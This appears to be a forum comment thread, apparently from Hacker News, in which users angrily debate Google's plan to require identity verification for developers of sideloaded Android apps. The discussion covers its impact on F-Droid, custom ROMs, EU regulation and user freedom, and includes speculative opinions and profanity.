Hong Kong protestors bought Android phone en masse when Apple removed apps they used to fight back on Chinese censorship, if Google is allowed to do the same you can say goodbye to freedom of information in many countries. You’re focusing on revanced when it’s the least of the issue.
nabogh · 34m ago
Yeah if this goes ahead I'm going back to my feature phone
antman · 2h ago
This was probably the reason Nokia died. Symbian development, already cumbersome and app deployment required some such procedure. I remember there was an joint effort in a china based forum and many of us got a cert and a key for our phones. I was reading Nokia obituaries from its executives and the sorry state of Symbian development and app deployment was not considered as a cause. So here it, is young executives repeating a simplistic and destructive strategy. ibm, xerox, nokia and intel will be very proud.
risho · 2h ago
These companies need to be destroyed by antitrust violations. I am so tired of these tech companies abusing their market position. I want the FTC to stop being toothless and useless and just absolutely crush these companies. The amount of disdain I have for these companies can't even be properly expressed.
ta8645 · 1h ago
These companies are in bed with the government, you're not going to be saved by any legislation. Many people on this site supported Google censoring the Covid anti-vax idiots, but it should have made it very clear that Google was working at the behest of the government. They're in bed together; the government gets to do an end-run around the constitution, and Google gets to rely on special government privileges and protection. Win-win.
akomtu · 1h ago
These corpos are part of the government, more or less, and they simply implement the edict to get rid of privacy. Not only in America. Smartphones have become eyes of the govs, while the Internet - something akin to their neural system. What's more interesting is why the govs feel so paranoidal and insecure recently? What are they afraid of?
vagab0nd · 1h ago
When I switched from Android to iOS, this was one of the things I missed a lot: the ability to write my own app and side load it on my phone. Even more so with the advent of LLM. Oh well, now I don't have to worry about that.
tambourine_man · 1h ago
Android is getting more closed and iOS more open, I expect more people dissatisfied from both camps. We’ll have less choice overall as they gravitate towards a common middle ground.
falcor84 · 1h ago
Will this be what finally leads to the success of a fully open-source Android fork such as CalyxOS or GrapheneOS?
AlgebraFox · 1h ago
CalyxOS is already dead. GrapheneOS is the only hope.
"A recent analysis by the company found that there are “over 50 times more malware from internet-sideloaded sources than on apps available through Google Play.”
Ok, but what's the real damage? In other words, how many installs and how much money siphoned from users and legit apps?
b3ing · 29m ago
They want to stop adblocking YouTube apps
EMIRELADERO · 3h ago
Holy shit, going to the official page[1], there's something that is somehow even worse than the loss of freedom:
"You'll need to prove you own your apps by providing your app package name and app signing keys."
This is confusing, since signing something already proves that you own the key.
mh- · 3h ago
My assumption is they want to eliminate/prevent schemes where a ton of apps are signed as a service by a small number of centrally controlled keys.
Someone elsewhere in the thread said this is how F-Droid works, but I can't confirm firsthand.
layer8 · 3h ago
The signing certificate should indicate who is signing, and therefore who is liable. But maybe that’s not how they set it up previously.
nullc · 2h ago
they've been demanding signing keys for apps distributed on the play store for years.
The only credible explanation I can come up with is that they need the keys in order to produce indistinguishably backdoored versions of applications, handy for tools like signal.
Otherwise one would never think of requesting the private keys-- if google wants to rebuild apps themselves they could sign with their own keys and possessing anyone elses private key is just pure liability as if there is any discovered abuse they can't show that they weren't the vector.
luke-stanley · 2h ago
So sketchy!
JimmaDaRustla · 59m ago
I'm waiting for this with chromium too. Microsoft Edge most removed uBlock Origin on me today.
arnaudsm · 1h ago
Most Android apps are crapware anyways. The only respectful apps that I know are open-source, and are being kicked out the of play store progressively.
I'm cancelling my Pixel 10 preorder.
bit1993 · 48m ago
Great. I suspect this will push more developers to publish web apps.
Animats · 4h ago
Does this break F-Droid?
drumhead · 4h ago
Would be a tragedy if it did. So many interesting and useful apps there without the obnoxious ads or nagging to upgrade.
Animats · 3h ago
I'm entirely on F-Droid, with no Google account and no Play Store. Losing F-Droid would force me off Android.
janice1999 · 3h ago
I'm the same. No Google account since 2012. F-Droid is an amazing community effort and has enabled me to find so many great open source applications.
o11c · 2h ago
Same.
One thing that annoys me is that a lot of F-Droid apps are obviously naive ports with overbroad permissions like "can read the entirety of storage", but that's still better than the all-consuming Goo.
kykat · 4h ago
Maybe F-Droid can sign all packages themselves? Would google let them do that?
imhoguy · 1h ago
The risk is Google could ban all F-Droid apps in one step, which will happen for sure.
can16358p · 3h ago
"Can?"
Sure.
"Would?"
Google has zero incentive to do that.
kurtoid · 1h ago
How does this affect installing an APK to an offline device?
Will there be a local override?
everdrive · 2h ago
I saw this coming a mile away. Everyone said you could install whatever you wanted on Android, but you were always jumping through some crazy hoops to do so. (compared to a general propose computer)
Trasmatta · 2h ago
I rely on an open source app called xDrip to manage my diabetes. It's way way way better than any of the official apps. It's not distributed on the app stores for obvious reasons. Many others rely on this app as well. Are we cooked?
nvdr · 2h ago
Will this affect GrapheneOS users who have Play Protect / Services disabled? Wondering how they intend to do the verification.
antiloper · 4h ago
Why even run Android at that point anymore? iOS devices get security updates for longer and have much less data collection than stock Android.
GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (https://news.ycombinator.com/item?id=44765939), and without kernel security updates that OS can't continue.
Now there's also no more sideloading, so what purpose does Android even serve anymore?
gruez · 4h ago
>GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (https://news.ycombinator.com/item?id=44765939), and without kernel security updates that OS can't continue.
The comment in the thread you linked directly contradicts the claim that "bootloader unlocking will also go away".
kllrnohj · 4h ago
> iOS devices [..] have much less data collection than stock Android
iOS does a tremendous amount of data collection including for the usage of ads as per Apple's privacy policy. All the same types of data that stock Android collects, even.
You may believe Apple is a generally better steward of that data than Google, but using iOS does not reduce the amount of data being hoovered up in any meaningful capacity.
> Now there's also no more sideloading, so what purpose does Android even serve anymore?
I hate this change, but I still prefer Android. iOS is hardly perfect nor does it do everything better...
subarctic · 2h ago
Exactly, the only reason to be a weirdo and have android in the first place was because there's so many good apps available outside the play store, if they lock it down just like Apple then what's the point?
ranger_danger · 4h ago
> what purpose does an open source OS have against a proprietary one
lenerdenator · 4h ago
FOSS means a lot less than it used to in Android.
Can you download, build, and install a basic Android system these days without touching a single piece of closed code? Absolutely. Will it be able to do much without closed binaries? No.
Android isn't GNU/Linux where there's a general ethos of making everything in userland FOSS if at all possible. Rather, it's a free OS that both Google and manufacturers can do anything they want with, including shove a ton of spy and bloatware on it, then make it to where you can't get rid of those things, at least not easily.
The optimism from 15 years ago surrounding FOSS in the mobile space is on its deathbed.
ranger_danger · 4h ago
I would argue any amount we can get is still lightyears better than not being able to replace or inspect anything at all on the system.
Rebelgecko · 3h ago
A phone running just the FOSS parts of Android is not super viable for the average person.
hagbard_c · 4h ago
> Why even run Android at that point anymore? iOS devices get security updates for longer and have much less data collection than stock Android.
Because Google-free AOSP-derived Android distributions are far more versatile, offer far more freedom, impose far fewer restrictions and tend to end up being far less expensive than whatever the fruit factory decides their dedicants have to use today. If Google goes the way of the fruit folks and AOSP no longer offers these freedoms the next step is not to surrender to the Church of Apple but to find a way to evade those restrictions.
cryptoegorophy · 53m ago
Anyone else remembers “don’t be evil”?
sirjaz · 2h ago
With more and more things like this, we need to back to making native apps on desktops and laptops where we as the users are in control.
GZGavinZhao · 2h ago
I'm curious what is going to happen to all those Chinese ROMs and third-party Chinese app stores.
imhoguy · 1h ago
China will push own Android OS forks into other markets even harder, if they do it fully open-source then bonus for them, users will force devs (banking apps etc) to get more support. A good example is one EU bank which publishes to Huawei's AppGallery to support non-Google certified Android phones.
It is funny how true this becomes with passing day.
_benj · 4h ago
It seems that it was only about time… it just feels like the pace of enshittification with big tech being able to get away with anything is crazy!
I’m hoping that projects like Precursor can take off because we’ve buried ourselves in such mountain of complexity that seems like only a billion/trillion dollar big tech company can make an OS.
But then again, some body called BS on browsers and we might have a good option soon in Ladybug!
You know how folks in the UK are cutting the surveillance cameras, what is the equivalent here?
WorldPeas · 49m ago
making an ADB-based debloater and browser shims to use stuff like bank apps, then sharing that with others. Then again, like cutting wires, it doesn't address the root cause.
smashah · 2h ago
Not updating Android I guess
kitsune_ · 1h ago
Well I guess that's good bye Pixel and Android for me then.
2OEH8eoCRo0 · 3h ago
So that's how they kill newpipe.
xenago · 1h ago
This is the final nail in the coffin for personal computing
SJMG · 1h ago
It's a blow, but this is over dramatic.
luke-stanley · 2h ago
So Google won't even offer a system toggle to let users install an app they've made or copied?
Google don't even expose a per-app toggle for app Internet access, why am I surprised?
This is disgusting.
Freedom died a little bit more today.
Why is end-user choice and consent not considered?
It's really disturbing that the EU and Google would do this.
I can't recommend Android or iPhone because of this nonsense.
mzajc · 1h ago
> Why is end-user choice and consent not considered?
The elimination of user choice was very much considered. In fact, it's the primary goal.
geekamongus · 1h ago
This doesn't seem to be going over well.
xenago · 1h ago
Only developers care. The users don't even know what sideloading is. This will successfully kill off the single remaining freedom users have.
turblety · 3h ago
Phew! I was just about to get the new Pixel too, not going to now. I wonder if Samsung will be effected.
thayne · 3h ago
> The changes will affect all certified Android devices once live
I think that is a yes, it will affect Samsung
mh- · 3h ago
Yeah, I think anything that has Google Play would fit that qualifier. So that's basically all major devices (in the West, at least). Oof.
logicchains · 3h ago
It'd be really funny if Chinese Android devices actually end up being more free because they don't have any of the Google Play stuff on them.
lucb1e · 1h ago
Note that most of them do. Huawei was banned from it but I'm not aware of other notable brands that do not ship Google software (besides that one vendor that ships Apple software)
coastalpuma · 1h ago
From the announcement
> our recent analysis found over 50 times more malware from internet-sideloaded sources than on apps available through Google Play.
This has the potential to be disastrous for Google, but maybe not.
Personally: I don't use Apple because I like being able to whip together little apps to side-load without having to check in with a walled-garden mothership. If Google is going to move closer to Apple in that regard... Apple's UX ecosystem is better, so I have far fewer reason to keep using Android.
bigstrat2003 · 4h ago
I suspect this won't be disastrous for Google, because where will people care about this go? Apple, who is even more restrictive? This is just another in a long series of incidents showing why we desperately need a real alternative to the mobile duopoly. I would ditch Android over this, but there's no realistic alternative available to me.
Damn the future sucks ass.
asyx · 3h ago
I think the only thing hat can save us is a jailbreak. Either for iOS or Android to let you sideload apps.
Alternatively, and that’s almost bullshit, the dumb phone trend continues and we might get devices like PDAs. Get a dumb phone and a small camera and then your PDA for everything that is essentially an app. Not sure what OS they’d run but I don’t see another way.
3036e4 · 3h ago
Android also allows apps that can run arbitrary code, like emulators and various other runtimes. I think iOS still doesn't? I have not written an Android app in ages, other than at work, but I often write silly little things running in the Löve 2D Loader, or TIC-80, or DOSBox, or just command-line tools running in Termux (I hear there is an X-server as well to run GUI applications from Termux?).
As long as they still allow running stuff inside of apps like that I will probably not abandon ship yet.
bigC5560 · 15m ago
They recently allowed emulators, like RetroArch, to be on the app store. They still require the emulators to be written in Swift AFAIK. Still quite a bit more restrictive than Android, but they have slowly been opening up.
zb3 · 3h ago
Never, I'll stick to LineageOS till it ceases to exist.. then I'll just buy a dumbphone, f... Google!
zer0zzz · 3h ago
Juggling between Maemo and iOS back in the day I always thought it was so wild that I later years people thought of Android as the open alternative.
matheusmoreira · 1h ago
Of course they will. It started with Play Integrity and hardware remote attestation. Soon Android will be nothing but a shittier version of iOS.
ktallett · 3h ago
Well this is me moving to E/OS full time.
myaccountonhn · 3h ago
What does this mean for projects like Grapheneos, or fdroid?
anonym29 · 3h ago
"The changes will affect all certified Android devices once live". AKA GrapheneOS should remain unaffected (as it is not "certified", per Google parlance), and F-Droid should remain available - in theory.
If they keep up this "boil the frog slowly" crap though, I may be migrating off of Android and over to a strictly Linux-based phone, like a PinePhone, Librem, etc.
Fuck the scumbags at the top of big tech making decisions like these.
zb3 · 3h ago
Next step: require all "certified" devices to prevent unlocking the bootloader... then possibly kill AOSP...
I have no words.. or more precisely, those words are not the kind of words I'm allowed to write here.
janice1999 · 3h ago
AOSP is being killed piece by piece - zero community engagements, infrequent dumps with no commit logs, moving everything into Google Play services and recently no more binaries for Pixel phones just to make third party ROM developers lives a little more miserable.
smashah · 2h ago
Oh how I wish I could buy a Nokia N900 16 Pro Max and use Maemo 13
pentagrama · 2h ago
This means that for example I will not be able to side load Popcorn Time for Android [1] anymore?
> Google is explicit today about how “developers will have the same freedom to distribute their apps directly to users through sideloading or to use any app store they prefer.”
« Développer will have freedom » yet they are entitled to Google’s verification.
It’s just another stone in the grave of Android and even though I shipped off this sinking ship 6 years ago to iOS, this is still concerning because ultimately apple’s IOS is in competition solely with Android.
If Android gets so bad it has all the disadvantage of iOS, some more, for instance with the embedded spyware that manufacturer are paid to include, and none of the good side of iOS, then everyone lose. Apple doesn’t have to compete anymore, they just have to not suck.
vizzier · 2h ago
Can you even compile an iOS app without registering with apple?
black3r · 2h ago
Without an apple ID you can compile an iOS app, but can only run it in an iPhone Simulator on a Mac.
With a free apple ID (no additional registration needed) you can also install your compiled iOS app on your iPhone and have it working for 7 days before you need to re-install it.
aucisson_masque · 2h ago
Is it really different from what Google is doing ? Not being to compile or user not being to install have the very same consequence : your app can’t be used.
was a reason I bought Android. will they be sending me a refund?
effgoogle · 2h ago
Fuck google.
This combined with the 'age verification' coming to all Google properties means it is a very small step from that new world to full Google verification of everything you visit and everything on your device, at any time, for any reason with the penalty being incontestable ban from your device, apps and data.
Get ready for facebook style 'we are interrupting you for a video selfie because we have detected you are a threat' across all google properties (Android, Chrome, Gmail, Maps...).
Move to linux phones, now.
macinjosh · 2h ago
Keep your phone. All you have to do is say no to digital for:
- money
- tickets
- identification
They cannot force everyone to own and buy a phone.
akk0 · 3h ago
This isn't legal in the EU is it?
sunaookami · 2h ago
It is. Notarization like Apple does is also legal. In fact the EU commission would welcome this with open arms since they can now access the personal data of every developer and can order Google to ban every app they want. This goes hand-in-hand with their new "Digital wallet" app that will be launched next year.
heyheyhouhou · 3h ago
if we continue this direction, in a couple of years, a feature phone might be an excellent choice!
> Starting next year, Google will begin to verify the identities of developers distributing their apps on Android devices, not just those who distribute via the Play Store.
Odd little phrase, "distributing their apps on Android devices".
I think "distributing" in this context is in the sense of product distribution, not in the sense of distributed systems.
But "distributing...on" sounds a little odd, like Google is still providing a distribution service. (Contrary to all the precedent of how we've thought of installing software, other than the proprietary, captive-user app stores.)
And so, maybe "distributing...on" makes it sound more like Google is (once again) entitled to gatekeep what you can run on your device/computer.
> However, developers who appreciated the anonymity of alternative distribution methods will no longer have that option. Google says this will help to cut down on bad actors who hide their identity to distribute malware, commit financial fraud, or steal users’ personal data.
Maybe it's not "developers who appreciated the anonymity" (which we immediately try to conflate with bad actors), but that the whole point lately has been to stop the greedy proprietary lock-in app store monopolies, and not have them gatekeeping what everyone else can do.
fluoridation · 1h ago
"Distribute on" sounds odd because it's incorrect. APKs are not distributed by putting them on phones and carrying the phones from one place to another. "Distribute to" would be more correct; better yet, "develop for".
storus · 3h ago
Google is really turning into a dystopian company, destroying any goodwill their virtuous employees created in the past. It feels like they are primed to be the main turnkey tyranny facilitators.
can16358p · 3h ago
Google was always dystopian and evil. They just wore good mask for some time in the beginning.
SergeAx · 1h ago
I wonder, how hard is it to build an app on the phone from source?
_blk · 2h ago
Dick move. Go back to "do no evil" big G. Remember how you used to be the kool kid on the block? Now you've just become the grown up you showed contempt for in your prime time.
I doubt I'll move away from Android too soon, but that definitely makes me reconsider whether any Google services have a right to CPU time on my device.
blinky88 · 2h ago
Absolutely disgusting. No reason to keep using Android then.
TZubiri · 1h ago
Could someone explain why the personal privacy of software developers is more important than the cybersecurity of consumers and nations please and thank you
guerrilla · 1h ago
No, fuck you. Absolutely not.
lawn · 3h ago
How will this affect GrapheneOS?
ohdeargodno · 5h ago
Additionally, this kills apps like Revanced, NewPipe, SmartTube that will now be required to give out ID to Google, surely that's something they really want to do. All Open source development is at threat, Google's absolute dogshit procedures already imposed for the play store now imposed to the entire ecosystem. All for a shitty system that breaks down to "registering package names". Cool then, guess it's time to typo squat on every variant of com.faceboook.app, because users definitely check the package name and not "oh the icon is right and so is the title".
More and more locked down devices, Android source releases only being published once a year, device drivers for reference devices disappearing, and now, verification of all your software for your "security". The war on general computing is well and truly on.
It’s sad that smartphones now hold so much personal and private data but aren’t really under the control of their users.
janice1999 · 3h ago
> Imagine MS doing the same for Windows.
They already have a version of that - it's called Windows S Mode (Windows Store apps only, no EXEs or scripts, Edge only for browsing). If they get away with it, they would make it the default. Required Microsoft accounts was a step in that direction.
dvngnt_ · 2h ago
This is what caused gaben to create steamos which is now a somewhat viable ecosystem with the steamdeck and rumored machines
Pfhortune · 3h ago
> Imagine MS doing the same for Windows.
It will happen. We've been the frogs boiled in the pot for years, accepting forced attestation. Eventually they'll close off running unsigned code, and the PCs will probably have bootloaders locked to Windows as well, so you can't escape.
Mindwipe · 4h ago
So, now there will be a single kill switch where a malicious government can legally compel Google to annihilate apps not of their liking.
I find it hard to state how contemptible this is. How stupid. Everyone who worked on this has blood on their hands.
kirito1337 · 2h ago
Gives me another reason to use Custom ROM
stefan_ · 3h ago
I don't understand, when the EU announced that Apples "actually we need to sign all of these and pay us" requirement is illegal, Google was like "hold my beer"?
Break them up already, it's getting old.
p3rls · 2h ago
has anyone had to help any elderly relative with the million scams they've downloaded from google's app store? google does not give a shit about helping regular people avoid scams, it's all just bullshit.
not even to mention the h1b indian kickback stuff that's about to hit them. couldn't happen to a nicer company.
lucb1e · 1h ago
Helping elderly with scams: Yes, today, with Google Chrome. They got tricked into allowing desktop notifications and they look super legit on Microsoft Windows, styled like antivirus notifications and everything, covering the browser UI to get to the settings. I don't see how using closed software helps here
aspenmayer · 3h ago
Boooo. Fuck this noise! Might as well run iOS at this point, unless your use case needs Android only apps or workflows.
What a fucking joke.
31337Logic · 4m ago
TL;DR
If you're not using Linux by now, do yourself a favor and start. You could do worse than starting with Linux Mint or PopOS, but whatever you do, get ahead of the curve and transition to these user-friendly open sourced OSes. The alternative is far, far worse at the moment.
rahidz · 4h ago
Sorry, we're getting rid of Revanced, Newpipe, Xmanager, etc. for your own good. Just like how Manifest v3 was for security. /s
pmontra · 4h ago
That might be one of the reasons. Get rid of competition by legal means.
In my case I keep a copy of K9 Mail 5.6 with the original UI (the reason I choose K9) and I sideload it to every device of mine. I'm afraid that I'll have to register an account and what, claim that that K9 is mine?
devinprater · 2h ago
Well time to make sure mobile Linux is accessible so the blind users aren't the only ones left when all the world switches to Linux /s
beeflet · 4m ago
aren't there braille terminals that work with linux? I don't know how you would make a rigorous blind UX other than working with a text interface first.
GZGavinZhao · 2h ago
Year of mobile Linux OS? /s
subarctic · 2h ago
Maybe Elon Musk can save us /s
JustExAWS · 3h ago
While I like to jump on the Google bash train as much as anyone, this is to comply with EU laws.
Apple implemented a similar change for the EU App Store earlier this year to comply with the Digital Services Act (DSA), a regulation that now requires app developers to provide their “trader status” to submit new apps or app updates for distribution.
HelloImSteven · 3h ago
But this is for apps outside the Play store, so the DSA isn’t at play here insofar as Google needs to be concerned. I don’t think there’s any solid decision on whether third-party app distribution is subject to the trader requirements, but if/when there is, it’d presumably be on the alternative distribution platform to enforce, not Google. Plus, Google already adjusted its policies to comply with the DSA.
For the record, Apple notes that the DSA requirements only impact developers distributing through the App Store, not through alternative distribution [1].
I.e. it doesn't require this at all, it merely requires Google require verification for apps that they themselves distribute. What they've been doing all along until now plus or minus minor bookkeeping details on what data they collect.
morsch · 3h ago
So they (or rather TC) claim. Does the DSA actually require it, though?
201984 · 3h ago
Just wonderful. Why does Europe insist on imposing regulations like this that companies then force on the rest of the world? It's one thing if they're benign but this very much isn't.
o11c · 2h ago
Only monetized apps (whether that be directly paid, microtransactions, ads, etc.) are legally required to go through that process - and it's a perfectly sensible requirement for the government to say "if you want to run a business, you need to do so as a business".
That is most apps - but not the kind of apps Google is attacking here (personal-scale, actually-free, third-party, etc.). And "apps that are not monetized" is actually a very nice thing to filter for from a user perspective.
Of course, the world's largest malware vendors love to use government action as an excuse to do something else malicious.
thayne · 3h ago
IANAL, but I don't see how that applies to apps that Googled doesn't distribute.
mvdtnz · 3h ago
There is no law in EU which requires Thailand-based developers to provide their trader status in order to serve Thai customers. Stop making shit up.
croes · 3h ago
They usually fight harder against such laws if they don’t suit them.
NoahZuniga · 5h ago
Seems reasonable
guywithahat · 3h ago
I don't like it, however I do feel sympathy for Google. There are probably a lot of idiots who download spyware.apk, it breaks other legitimate apps, steals their information, and then they go online and complain about how Android isn't secure or otherwise doesn't work.
Users should be allowed to brick their device if they're sufficiently stupid, but I feel bad for Google who has to deal with some of those people blaming them.
sunaookami · 2h ago
You don't need to feel bad for them, the Play Store is full of malware so what makes you think this change will help? This is a self-inflicted problem.
kbolino · 3h ago
I would be surprised if Android has a reputational issue among users. Maybe at the margins, but not enough to significantly affect market share. Most people have already sorted into iOS and Android camps already.
To whatever extent Google may be responding to an issue arising from the market, it is likely at the behest of large companies, especially payment processors, payment card networks, banks, etc. These institutions lately have begun to exert increasing influence over end-user activities, and it would not surprise me if they are playing a part here, too.
ktallett · 3h ago
Why is there no sensible behaviour and knowledge around APK installation like there is about any piece of software on a personal computer?
Zak · 3h ago
It is also common for people to install things on Windows without thinking critically. It is perhaps less common on Mac OS, but I've seen someone get malware that way.
My position is that this is not the OS vendor's responsibility to prevent. A warning is fine. A scan for known malware by default is fine. Beyond that, it's my device and it's my choice to get software from wherever I damn well please even if it might be a bad idea.
codemac · 3h ago
I have little to no evidence that there is sensible behavior and knowledge around software on personal computers.
The biggest difference these days is most folks don't even use a personal computer.
ktallett · 3h ago
But there is far more education and knowledge that it is a bad thing.
gjsman-1000 · 3h ago
Because only 5% of American adults are highly literate with technology, 30% of working adults self-identify as "never (ever!)" using folders and files for organization, and most people have better things to do with their time to be taught to perfectly analyze the safety of an App Store. Don't hope in the next generation either - only 38% of Gen Z could successfully complete tasks more difficult than moving an email between folders, while an IEA study found that only 2% of Gen Z had reached the anticipated "digital native" stereotype level of fluency.
cookiengineer · 3h ago
Can you please post the source of the study?
A4ET8a8uTh0_v2 · 1h ago
Thank you. The number sounds impossibly high. Like I did meet people like it, but not nearly as often.
babypuncher · 3h ago
I would argue that Gen Z is worse at computers than Millennials specifically because we put too many guardrails in place to make computing easy for the illiterate. Now we are all paying the price, as user agency is continually eroded away to further protect the dumb from their own unwillingness to gain a basic understanding of the very tools critical to their daily life.
ktallett · 3h ago
Firstly what is the source and secondly, the US is not the majority user of mobile phones and especially not android.
Yeul · 1h ago
I don't really understand. These people would never download F-droid in the first place or go into settings to enable dev mode.
And besides if you really want to combat fraud stop using creditcards for fuck sake and make a modern payment system that doesn't rely on 1970s technology.
Aaargh20318 · 3h ago
What makes you think that people are sensible about installing shit on their personal computers?
guywithahat · 2h ago
They're not, and Windows got decades of hate for it. Google probably wants no part in that, especially since Apple mostly avoids viruses and malware through their app store
zb3 · 3h ago
This is just an excuse. Google doesn't care about these people, they already proved that by showing scammy advertisements, as long as they get their profits, they don't care. Don't fall for this "it's for your security" argument.
seviu · 3h ago
It’s an excuse they use. The don’t care if your average grandmother gets infected by a virus.
This trust me bro, our App Store is safer is just getting on my nerves. Every day we get malware popping on both app stores.
This is absolutely unacceptable. That's like you having to submit your personal details to Microsoft in order to just run a program on Windows. Absolutely nuts and it will not go as they think it will.
This is the future; partially fuelled by malware, partially fuelled by the desire for platform control, and partially fuelled by government regulation.
This regulation of NSW, Australia considers rooted devices with extra non-Google/non-Apple approved security features such as a duress/wipe PIN (a standard feature of GrapheneOS[2]) as a "dedicated encrypted criminal communication device". How the device is being used doesn't matter. It's how it _could_ be used.
[1] https://classic.austlii.edu.au/au/legis/nsw/consol_act/ca190...
[2] https://grapheneos.org/features#duress
"(3) A dedicated encrypted criminal communication device does not include-- (a) a device if-- (i) the device has been designed, modified or equipped with software or security features, and (ii) a reasonable person would consider the software or security features have been applied for a primary purpose other than facilitating communication between persons involved in criminal activity to defeat law enforcement detection,"
It's not automatic: depending on what a reasonable person thinks and the definition of criminal activity.
Does the jurisdiction matter? For example, if an activist was using a device to do things in another country that would be legal in Australia but were crimes in the other country.
They tried to pull a similar move with WinRT/UWP, but nobody wanted it, so now you can continue with Win32.
They would love to do so, but legacy compatibility is a major business advantage.
They did a bunch of terrible inept rollouts with confusing technology for both users and developers and effectively shot themselves in the foot. But it did not have to go down that way.
Sounds like a nightmare universe.
I've got a hobby app in kotlin multiplatform with iOS/Android/Windows/WASM builds and while I have no issues with Apple's App Store or Google Play, I've had nothing but problems trying to support Windows Store.
The MSIX installer format is horrendous to deal with and the certification process for new releases on Windows Store is always far too long and in the cases they do find issues the reports of the issue that they log are entirely worthless.
I ended up just pulling the app off the Windows Store entirely and making it a downloadable *.msi installer. While the extra layer of presumed integrity of the app being on the Microsoft Store would be nice it wasn't remotely worth the effort for the tiny amount of people who were using the Windows version in the first place, especially given the app is free.
A lot of legacy software was killed off with the move to 64-bit Windows. Consumers survived that and for businesses registering their software with MS isn't a problem. They're already handing Microsoft all of their company email, their documents, their spreadsheets, etc. and paying Microsoft for the privilege. MS doesn't care at all about consumers.
Windows was never going to go another way than this.
Users who care about hardware and/or software freedom should be on linux.
What a lovely granny that totally exists.
This doesn't make much sense to me.
To put the strongest face on it, by "cracked" youtube, you mean a version that shows the cracker's ads and maybe somehow generates extra clicks (or whatever) so they can get money out of it?
Cracked spotify? In my mind that's just like YouTube, almost entirely server-side. I guess you're talking about hijacking ads here, too? I feel like a "real" crack of Spotify would let you listen to music for free, but that should be impossible (unless their SWE's are incompetent).
My favorite was a local "discover which on your contacts is on the leaked Covid quarantine list[1]" scam app. It claimed that the extra permission dialogs are just fearmongering by Google, who is in cahoots with big pharma, and wants covid to spread to sell more medications.
[1] In fact, no such leak has ever taken place, its existence was just part of the setup for the scam.
It will not happen in the next 10 years. Right now people would just make generic launchers and then use them to manually load and execute any binary they please. Options include just writing your thingy in a scripting language and run it in node.exe, python.exe, or compile it to WASM, use native bindings of a scripting language, abuse a random verified electron app, ship with and use a random vulnerably driver, etc etc.
Even remotely getting to the point where locking Windows down to that degree would be possible is going to take MS a long time, fighting friction from users all the way. The whole ecosystem would have to change drastically for that sort of control to even be possible and make sense.
The holes aren't really there because it would be so hard to close them in a vacuum, they're there because decades of software people use rely things working the old way. People aren't going to switch to a new OS on which almost nothing works anymore.
The saddest part is this is to the detriment of literally everyone except a couple rich owners of those companies. And everyone has the right to vote. But western democracy is so indirect the people who understand and care have no way to change the law because their signal is lost in all the noise by those who don't know or don't care.
If the vote came down to people in favor of walled gardens or in favor of forcing companies to open their platforms, with everyone else not voting, it would be a landslide. But there's no way to vote on it this way.
I am so sick of Google.
This is a monopoly with annual gross revenues bigger than all but 42 countries behaving this way.
They have conspired to control the web, browsers, mobile computing, and soon AI. It's sickening how much bad behavior they get away with.
They were able to use YouTube to bludgeon Windows Phone to death and become the de-facto mobile duopoly. Then they were able to get their shitty search engine on all the panes of glass, didn't care one iota about search quality (just ads), but were able to leverage their browser engine control to remove adblocking capabilities.
I hope the DOJ/FTC split Google into a dozen companies.
Sincerely.
There's no chance of that under the current regime. It loves bribery and Google has the money to get whatever they want.
Someone should hit surveillance-alt-delete!
There's no law against a more democratic way to implement the broker either but it requires interesting methods of coordination and/or decision making that doesn't seem to exist yet?
Seems like it wouldn't be much of a stretch to compare that statement to not starting a business because the economy is unfair. People indeed don't start businesses when the bureaucratic or tax overhead outweighs the financial benefit, but nobody loses sleep over an individual's hypothetical missed opportunity to learn a new skill but them. Doesn't matter to the platform owners unless it also stops being profitable, so it's their job to maintain the profitability for their ecosystem despite whatever barriers they put up.
so much extra work involved that isn't building the app.
I worry how this will affect fdroid etc.
I think they might just get away with it.
That's if they're available at all. In my country, only cell phones certified by the telecommunications government agency (ANATEL) can be imported, so the alternatives (Jolla, PinePhone, Fairphone) simply don't exist.
They do marvellous things like mandate weird Brazilian Android games on the phone I bought in Brazil.
Atlanta or Tbilisi?
I'm currently researching Android alternatives, including Librem and Jolla C2, and I'm skeptical that those will be compelling. It's just so sad.
If they have anything on the platform that is subject to the CRA, they are a distributer:
https://www.cyberresilienceact.eu/cra-guide-for-importers-di...
Use an iPhone, minimize my use of it. Continue to emphasize Linux on all my other devices. Move away from Google and Apple services to as much self-hosting as possible. Leverage TailScale to make my services accessible, globally, without actually exposing them on the internet. I'm just assuming that I will have to have some kind of attested device in order to run banking and payment apps and that might as well be a locked down device like an iPhone.
I'm not sure Google still has the ecosystem by the balls. It's very possible whatever Googlers who made this decision are the type of folks who don't comprehend they work for a monopoly that like actually can't do things like this anymore.
The intentions behind all the security hardware they introduced in pixel phones first, and is now required by play integrity to function might've been well-meaning, but that doesn't really matter in the end. Security features that the user can't control and bypass aren't security features - they're digital handcuffs.
https://learn.microsoft.com/en-us/windows/apps/develop/smart...
If google does that then it’s not the worst.
Worst is having to get my ID and all details scanned and processed by Google.
How will it go? Where are people going to go? People who draw a hard line on this can’t go to iOS for more freedom. Linux phones aren’t ready for prime time. So what’s left? Going back to a flip phone that doesn’t even have the capability of running apps in the same class?
Microsoft would love to do that too, but it just has too much of legacy software to introduce such a major hurdle.
Even with a signature they can't guarantee it doesn't have malware. The fact that signed malware exists should be enough to put an end to the argument that it's for our own good.
To meaningfully challenge it, developers need to agree to withheld supply like a cartel (illegal?) or union.
I think it’s probably close to the union scenario in an industry with a single employer, as there is that one too many relationship (all developers vs Google). Whereas a cartel is a few suppliers conspiring against all consumers.
I’m not sure developers would go to those lengths, and I’m not sure it would work either as the benefit is too high from defecting from such a coalition.
https://www.gnu.org/philosophy/right-to-read.en.html
The real heroes are the people that facilitate alternatives, not those who talk, and Stallman was of the talking variety.
I know quite some people who live this way, and are very willing to overcome inconvenient hurdles to avoid having to use such a spying device.
Nowhere does that require you to go and get a DUNS number, which is onerous for a single developer to do without the infrastructure of a company.
It seems kind of odd to me to rely on some kind of external hidden "credit agency"-style company for this? And why would DUNS want to know about some kid in their basement in Bangledesh making (non-malicious) apps, and why would the kid want Dun & Bradstreet to know about them? It makes no sense at all.
It's not that the identity prevents malware/abuse, but publishing any malware to the store burns the identity and establishing another is harder than simply coming up with a new email address. It's not necessarily the best scheme out of there, but it makes sense given their apparent goal.
They do a lot of other horrible things too, they could expand the definition of malware.
Youc an see the zeitgeist forming around corporations wanting to lock out any small unlicensed company from working on phones.
The key is mostly fascism in the guise of "security". Witness stuff like the ICE tracker app. Google would love a way to freeze out both it's appearance on the app store and any developer who'd program similar.
Which is exactly the same policy as Apple.
